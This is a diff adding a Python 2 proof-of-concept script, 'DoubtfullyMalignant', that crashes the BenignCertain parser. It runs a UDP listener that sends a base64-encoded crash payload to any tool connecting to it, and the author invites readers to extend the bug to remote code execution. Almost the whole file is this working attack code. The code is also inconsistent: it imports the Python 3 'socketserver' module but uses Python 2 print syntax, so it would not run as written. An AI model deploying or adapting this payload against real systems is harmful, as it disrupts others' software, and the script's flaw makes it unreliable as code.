|
| 1 | +#!/usr/bin/python2 |
| 2 | +# coding: utf-8 |
| 3 | +# Author: Darren Martyn, Xiphos Research Ltd. |
| 4 | +# Licence: WTFPL - wtfpl.net |
| 5 | +""" |
| 6 | +DoubtfullyMalignant - BenignCertain DoS PoC |
| 7 | +
|
| 8 | +I know, I know, "No More DoS PoC's", however, upon having a more skilled |
| 9 | +at reverse engineering colleague at Xiphos examine the binary in IDA, |
| 10 | +it was determined that this bug is probably not exploitable to gain RCE. |
| 11 | +Either that or we just don't know how to do it :) |
| 12 | +
|
| 13 | +Anyway, I drop this PoC here for you, so you, too, can crash silly NSA |
| 14 | +toys. And maybe one of you clever folks can figure out what we missed to |
| 15 | +gain RCE? |
| 16 | +
|
| 17 | +Anyhow, how this all works is. You set it up listening on a port. |
| 18 | +When bc-id is ran against it, it responds with the crashing data. |
| 19 | +This will NOT crash bc-id, however, bc-id will write the data out |
| 20 | +to a file (serversipaddress.raw and serversipaddress.hex). |
| 21 | +When the parser (bc-parser) is ran on the created file, it will segfault |
| 22 | +because it is a hilariously badly coded piece of shit. |
| 23 | +
|
| 24 | +Hello to all fellow scientists of the glorious Rum Research Institute ;) |
| 25 | +
|
| 26 | +~ infodox // @info_dox |
| 27 | +""" |
| 28 | +import socketserver |
| 29 | +import sys |
| 30 | + |
| 31 | +def PointlessASCIIBanner(): |
| 32 | + print """\x1b[1;32m |
| 33 | +██████╗ ██████╗ ██╗ ██╗██████╗ ████████╗███████╗██╗ ██╗██╗ ██╗ ██╗ ██╗ |
| 34 | +██╔══██╗██╔═══██╗██║ ██║██╔══██╗╚══██╔══╝██╔════╝██║ ██║██║ ██║ ╚██╗ ██╔╝ |
| 35 | +██║ ██║██║ ██║██║ ██║██████╔╝ ██║ █████╗ ██║ ██║██║ ██║ ╚████╔╝ |
| 36 | +██║ ██║██║ ██║██║ ██║██╔══██╗ ██║ ██╔══╝ ██║ ██║██║ ██║ ╚██╔╝ |
| 37 | +██████╔╝╚██████╔╝╚██████╔╝██████╔╝ ██║ ██║ ╚██████╔╝███████╗███████╗██║ |
| 38 | +╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ |
| 39 | + |
| 40 | +███╗ ███╗ █████╗ ██╗ ██╗ ██████╗ ███╗ ██╗ █████╗ ███╗ ██╗████████╗██████╗ |
| 41 | +████╗ ████║██╔══██╗██║ ██║██╔════╝ ████╗ ██║██╔══██╗████╗ ██║╚══██╔══╝╚════██╗ |
| 42 | +██╔████╔██║███████║██║ ██║██║ ███╗██╔██╗ ██║███████║██╔██╗ ██║ ██║ ▄███╔╝ |
| 43 | +██║╚██╔╝██║██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══██║██║╚██╗██║ ██║ ▀▀══╝ |
| 44 | +██║ ╚═╝ ██║██║ ██║███████╗██║╚██████╔╝██║ ╚████║██║ ██║██║ ╚████║ ██║ ██╗ |
| 45 | +╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ |
| 46 | + \x1b[1;31mBecause when you mess with the best, you die like the rest.\x1b[0m""" |
| 47 | + |
| 48 | +class DoubtfullyMalignant(socketserver.BaseRequestHandler): |
| 49 | + def handle(self): |
| 50 | + # boom is a 110 byte response that kills bc-parser |
| 51 | + boom = "AQAAAAAAAAAAAAAAAAAAAIRZpwZtOxAAAgAAAHhWNBJ4VjQSeFY0Enh" |
| 52 | + boom += "WNBJ4VjQSeFY0EnhWNBJ4VjQSAAAAAAAAAADU2CEAAgAAADw8PDzMzM" |
| 53 | + boom += "zMmQAAAKWlpaWEAAAAAAAAAAAAAADt/q3eAAA=" |
| 54 | + sock = self.request[1] |
| 55 | + print "{+} Handling connection from %s" %(self.client_address[0]) |
| 56 | + sock.sendto(boom.decode("base64"), self.client_address) |
| 57 | + print "{*} Crashing Response Sent. Lets hope they run bc-parser on it ;)" |
| 58 | + |
| 59 | +def main(args): |
| 60 | + PointlessASCIIBanner() |
| 61 | + if len(args) != 2: |
| 62 | + sys.exit("use: %s listener_port" %(args[0])) |
| 63 | + try: |
| 64 | + print "{+} Launching Server on port: %s\nCTRL+C to kill me." %(args[1]) |
| 65 | + server = socketserver.UDPServer(("0.0.0.0", int(args[1])), DoubtfullyMalignant) |
| 66 | + server.serve_forever() |
| 67 | + except KeyboardInterrupt: |
| 68 | + sys.exit("{-} Killed. Shutting down.") |
| 69 | + |
| 70 | +if __name__ == "__main__": |
| 71 | + main(args=sys.argv) |
0 commit comments